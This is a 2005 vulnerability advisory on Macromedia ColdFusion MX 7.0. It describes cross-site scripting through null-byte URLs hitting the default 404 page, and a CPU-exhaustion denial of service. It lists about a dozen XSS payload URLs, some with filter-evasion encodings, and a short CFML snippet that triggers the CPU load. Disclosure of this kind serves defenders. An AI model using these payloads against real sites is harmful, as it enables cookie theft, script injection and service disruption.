Macromedia Coldfusion MX 7.0 Security Advisory

21 April 2005

Remote Vulnerabilities in Macromedia ColdFusion cfm files




Synopsis:
Dr_insane has discovered some remote vulnerabilities in Macromedia ColdFusion 7.0.ColdFusion is an enterprise
application used to develop, maintain, administer, and deliver Web sites
on the Internet.The vulnerabilities allow a remote attacker to execute arbitrary HTML and script code in a user's
browser session in context of a vulnerable site as well as to perform some denial of service attacks.



Affected Systems:
ColdFusion Server for Windows 7.0



Description:
Three years ago a similar vulnerability had surfaced in ColdFusion Server version 6.0.0.46617. The problem
was that Macromedia's ColdFusion MX comes with a default 404 error page.This 404 error page presents
the path of the file requested, and was not filtering it for hazardous characters, 
which could be used for a cross site scripting attack. eg.
http://CF_MX_SERVER/<script>alert(document.cookie)</script>.cfm
This bug has been fixed in version 7.0 but it is still possible using some malformed url to conduct such 
kind of attacks.
This time in order to perform the attack you must request from the server a non-existence CFM file
following by a %00 and the script code you want to execute.



Examples:
http://127.0.0.1:8500/../../../../../../../.cfm.%00<A%20HREF=http://www.microsoft.com>Microsoft%20Site
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="http://www.google.co.uk/intl/en_uk/images/logo.gif">
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="javascript:alert('haked')"
http://127.0.0.1:8500/.cfm%00<XML%20SRC="javascript:alert('XSS');">
http://127.0.0.1:8500/.cfm%00<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
http://127.0.0.1:8500/.cfm%00<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
http://127.0.0.1:8500/.cfm%00<TABLE%20BACKGROUND="javascript:alert('XSS')">
http://127.0.0.1:8500/.cfm%00<IFRAME%20SRC=javascript:alert('XSS')></IFRAME>
http://127.0.0.1:8500/.cfm%00<BODY%20ONLOAD=alert('XSS')>
http://127.0.0.1:8500/.cfm%00<IMG%20SRC="jav&#x0D;ascript:alert('XSS');">
http://127.0.0.1:8500/.cfm%00<IMG%20SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>

Another variation of the above is:

http://127.0.0.1:8500/<BODY%20ONLOAD=alert('XSS')>.cfm

it seems that that the "three years ago bug" has not fully fixed.....



---
In addition to this another possible vulnerability found that may allow an attacker who
can upload files to a Coldfusion server to perform some denial of service attacks.
By uploading a cfm file with arbitary content of 3 Mb about
and run it CPU usage will hit 100% for some minutes. A similar vulnerability have been found some time ago it was fixed.
Tha exploitation code for that vulnerabity was and :
**Start of code**
<cfset
longstr = RepeatString("1234567890123456789012345678901234567890", 10000)
>
<cfset the_date = #DateFormat(longstr)#>
<cfoutput>#the_date#</cfoutput>
**End of code**




Credit:
Dr_insane
dr_insane@pathfinder.gr